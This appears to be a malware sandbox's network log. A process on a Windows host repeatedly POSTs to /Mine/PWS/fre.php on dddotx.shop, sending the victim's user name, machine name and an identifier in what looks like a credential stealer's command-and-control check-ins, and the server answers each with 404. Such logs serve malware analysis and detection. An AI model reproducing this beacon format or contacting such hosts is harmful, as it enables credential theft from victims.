Sep 25, 2024 10:19:58.849462032 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky0PoQYIU4RLi%2BNCf0D3WShYNRTT3zeFSHuO3qC4GBjh11ogvCcFv2dICnJrTduycO4TLfTQXJvDXtXrOX49qXgJkycNZU0i25t%2BMgIFQk4wPtSOgoMS0qQklTqlHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89979cc925440b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 10:19:58.849621058 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky0PoQYIU4RLi%2BNCf0D3WShYNRTT3zeFSHuO3qC4GBjh11ogvCcFv2dICnJrTduycO4TLfTQXJvDXtXrOX49qXgJkycNZU0i25t%2BMgIFQk4wPtSOgoMS0qQklTqlHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89979cc925440b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Sep 25, 2024 10:19:58.849971056 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ky0PoQYIU4RLi%2BNCf0D3WShYNRTT3zeFSHuO3qC4GBjh11ogvCcFv2dICnJrTduycO4TLfTQXJvDXtXrOX49qXgJkycNZU0i25t%2BMgIFQk4wPtSOgoMS0qQklTqlHg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89979cc925440b-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49758	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:58.995986938 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:59.000978947 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:59.725168943 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:59 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6WitqmhZ8B%2BGSEZW3acKw2YebenkInm4A6l%2FRw1r1v3ORGXgrxFQOowlwRftVc2h3lh6nIxgaloZKn5H40s7iumQlbRlQ3GeR80kzTmDA7BsYDFVch%2BmoSXNqfFvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997a858224233-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49759	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:59.886976004 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:59.891904116 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:00.560081959 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WChi1QIXX61JfiULSjt%2Bq3ACHNz9ME3BMx3yyDRgRFzOxjiBToLkuYk%2FiZ1sadCZYt2DoxqEMvmbRtSmC5AAQ4AFxlrEIBr2fwH4ZmP8gS07MLEd24e23kTM1socAQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997adcbb64249-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49760	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:00.714145899 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:00.718977928 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:01.361571074 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PlsQnQO8WvCZphPefhKVGmPnEqyp72RBVLH8v9697SDb%2BBImQb64F2QxLdIZR7q%2BqFY5zRiuOA5Tz1UsyxB80IF84GImJUmvb0vfBrYq4sBvKgzGyJY5sioLyGcbKw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997b2f83b42ce-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49761	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:01.519893885 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:01.526168108 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:02.228873014 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BhNEt4n1rZLkJ5EAQ3gmHLJpt%2FxMUbwZEQ7pqSkHjgBeoFR5S8JhlswTUqbDtqVBbVM5GW3jtH81ZW9P1elEEqFwNowcoZePh3DcAtzQ5d6cxJ9liRIK99jcJHR6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997b809f28c3c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49763	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:02.387046099 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:02.392071009 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:03.088596106 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxzI6dJOPblceUM0Sw9csJrys%2FR7CZbli8EHLwvK3x%2BeM9wr2EKrj2pLznelU7Jinf6wsMQyVYKy8S2GvgAC7TpMPJj6VkcMvc%2B08weUXzjQf8Ph5xirH9WnboBpDQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997bd6d574405-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49764	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:03.252350092 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:03.257255077 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:03.904649973 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeVZ0oj4nYJ8MLBHrQG8htA1ikp6XmZPNSYl1wAib9tpWKaxrLh6zlmnNRcs9o8X1Z3FdygztPbc%2F5iCoXc5GsviFIU3vz5wPfLI8GfcU1JjRZ9zxXJo%2FGFCPoMbxA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997c2dd7042cf-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49765	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:04.065716028 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:04.071219921 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:04.881788015 CEST	593	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LIAL0HIKAWve80VQ3bHdUWWkmCfFm5nbWLedkWKLzxv9S8JP7GNSDdyhUFczQ7i6MMBgw1ZzKMev0R75CJTCLYUWCLi6DLkC8RTg84TwCfXMT2ibYaIbPXuWVT%2Fhig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997c7ebc7c344-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49766	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:05.025248051 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:05.030103922 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:05.709095001 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=165xciF3CIJeGmb2pMxMrN4FuyFtk6oyTO%2FF%2FKdOw4eY9yUaJSFCm%2Bbv1fQU8FO3LVnwRen%2Fk045rTdCu1eetQvBlaZiNJcuUyEUIweHCfUaKtTTBKVWr3na5CuKsg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997cdfe5c43a5-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	49767	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:05.853837013 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:05.858736992 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:06.566374063 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O32TioDNtasVS2zWW8vsQkjS1Q7k6Zx8rZPaPbR%2FBLMpNZ%2Bz5%2FspvnkcIR5R7eIN4XBD%2FNN2h00wdckMkryOlB51OS6PCgC6cgQ758wUDzxEGSzs%2BoY2pG%2Fk49y7TQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997d3094743b9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	49768	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:06.713376999 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:06.718238115 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:07.429567099 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbcYUiQrMXMEMZxI6XpM3JESCeQKRpvjmquP9K3BSFaROxnKWUcmcIzcBBKb7F6Mlv2T2d2EKHsK74KGue09hY%2BCBnBTqQkoVJ9nDDrMCNgTmQS%2BLYh%2BrlRKTOod6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997d879760cc8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	49769	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:07.577991962 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:07.582940102 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:09.278275013 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:09 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qk4FnnBREqj3QBzsmkJkbsdGi9Aw0HEt%2BYBpdA0bPMY%2BVkJL5mAawI6dyUyl3oSE%2BcmIsIiA6vUgej2oMfPzAYEldfmoMYcEnlL0iIlImzRrYCdJc%2B4Tf7R6B5Cmnw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997ddeb31432c-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	49770	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:09.436377048 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:09.443638086 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:10.191735029 CEST	567	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mqchNe6mBEI8bNJjwbOFcHJzqv2%2BzSHsgUG52AUzOx%2BXnsSfluMUZEhDHrN0kF5MrncuYXknYahfY33xLEwcJCUPe%2BjZErolxFcaf1YAcoh87yIXElzTkNuegYj91A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997e979f042cb-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	49771	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:10.338665962 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:10.343573093 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:20:11.008219957 CEST	595	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:20:10 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q4Ib1Dyum34c2aj96wDdanhsrbSA%2FkLg8opE9Hkgy6JodCThkqucV59Vug0Nu6dzuzJkHf5tF2hAGPT6yUQyucz2KUTPGKYYLvlXGc3rlypLZ41QkYaGFv3x%2FDUePA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997ef3b0443bb-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	49772	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:20:11.157373905 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:20:11.162336111 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
